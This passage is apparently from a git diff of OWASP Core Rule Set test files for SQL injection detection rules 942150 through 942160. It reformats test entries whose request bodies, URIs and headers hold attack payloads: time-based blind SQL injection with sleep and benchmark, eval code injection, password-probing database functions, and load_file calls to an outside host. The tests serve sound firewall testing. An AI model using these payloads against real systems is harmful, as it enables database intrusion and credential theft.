text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=None')and (select*from(select(sleep(10)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 8 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 9 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=file:/init.ini'.sleep(12).'" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=file:/init.ini'.sleep(12).'" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 10 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=1)and (select*from(select(sleep(12)))a)-- : 1)and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 11 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/path/to/file/config.ini')and (select*from(select(sleep(12)))a)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 12 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 13 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test{${sleep(12)}}" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test{${sleep(12)}}" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 14 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+eval(compile('for x in range(1):\\n import time\\n time.sleep(12)','a','single'))+\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 15 desc: "Advanced injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=test\"+(function(){if(typeof gs78r==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gs78r=1;}}())+\"" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 16 desc: "Simple injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\foobar.txt\" or sleep(4) #" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\foobar.txt\" or sleep(4) #" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 17 desc: "SQLite 'json' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json%20(id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 18 desc: "SQLite 'json_valid' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" - version: HTTP/1.0 - output: - log_contains: id "942150" - - test_title: 942150-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20json_valid%20(id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] + - test_id: 19 desc: "SQLite 'glob' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" - version: HTTP/1.0 - output: - log_contains: id "942150" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op%5C'%20or%20glob%20(id,id);" + version: HTTP/1.0 + output: + log: + expect_ids: [942150] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml index 1b938cf..cd940dd 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942151.yaml @@ -2,189 +2,188 @@ meta: author: "Christian Folini, azurit" description: Various SQL injection tests - enabled: true - name: 942151.yaml +rule_id: 942151 tests: - - test_title: 942151-1 + - test_id: 1 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'||(select extractvalue(xmltype('%tocob;" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'||(select extractvalue(xmltype('%tocob;" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 2 desc: "Simple SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=/config.txt' (select load_file('\\\\\\\\unittests.coreruleset.org\\\\zow')) '" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 3 desc: "Advanced SQL injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=(select load_file('\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\unitests.corerule'||'set.org\\\\\\\\\\\\\\\\hvs'))" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 4 desc: "Simple injection using 'fetch_in_set'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=, FIND_IN_SET('22', Category )" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=, FIND_IN_SET('22', Category )" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 5 desc: "SQL injection using 'likelihood' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=1'%20%2B%201%20is%20likelihood(0.0%2C0.0)%20is%201--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 6 desc: "SQL injection using SQLite 'sqlite_compileoption_used' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'%20or%20sqlite_compileoption_used%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 7 desc: "SQL injection using SQLite 'sqlite_compileoption_get' function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40example.com'and%20not%20sqlite_compileoption_get%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 8 desc: "SQL injection using PostgreSQL starts_with() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=starts_with(password,'a')::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=starts_with(password,'a')::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 9 desc: "SQL injection using PostgreSQL jsonb_pretty() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=jsonb_pretty(...(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 10 desc: "SQL injection using PostgreSQL json_build_object() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" - - test_title: 942151-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=...(json_build_object(1,password)::jsonb)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] + - test_id: 11 desc: "SQL injection using unistr() function" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=unistr(password)::int" - version: HTTP/1.0 - output: - log_contains: id "942151" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=unistr(password)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942151] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml index 6b2576b..8005783 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942152.yaml @@ -2,54 +2,53 @@ meta: author: "Franziska Bühler, azurit" description: Various SQL injection tests - enabled: true - name: 942152.yaml +rule_id: 942152 tests: - - test_title: 942152-1 + - test_id: 1 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" - - test_title: 942152-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816400%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942152] + - test_id: 2 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" - - test_title: 942152-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1%27%20and%20starts_with%28password%2C%5C%24%5C%24t%5C%24%5C%24%29%20and%20%27true + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942152] + - test_id: 3 desc: "SQL injection in request header User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942152" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode%28lo_get%2816200%29%2C%27base64%27%29%3A%3Aint + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942152] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml index 86811fe..511fd3e 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942160.yaml @@ -1,175 +1,173 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Bühler, azurit" - description: None - enabled: true - name: 942160.yaml +rule_id: 942160 tests: - - test_title: 942160-1 + - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?sql_table=sleep%28534543%29" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?sql_table=sleep%28534543%29" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleEP(3)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleEP(3)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "sleep(5000)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "sleep(5000)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(2999/**/999,Md5(NoW()" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENChmARk(2999/**/999,Md5(NoW()" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BEncHMARk(2999999,Md5(NoW('')" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BEncHMARk(2999999,Md5(NoW('')" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENCHMARK(5000000,MD5(0x48416166)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "BENCHMARK(5000000,MD5(0x48416166)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(3000000,M%445(4)" - version: HTTP/1.0 - output: - log_contains: id "942160" - - test_title: 942160-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "benchmark(3000000,M%445(4)" + version: HTTP/1.0 + output: + log: + expect_ids: [942160] + - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 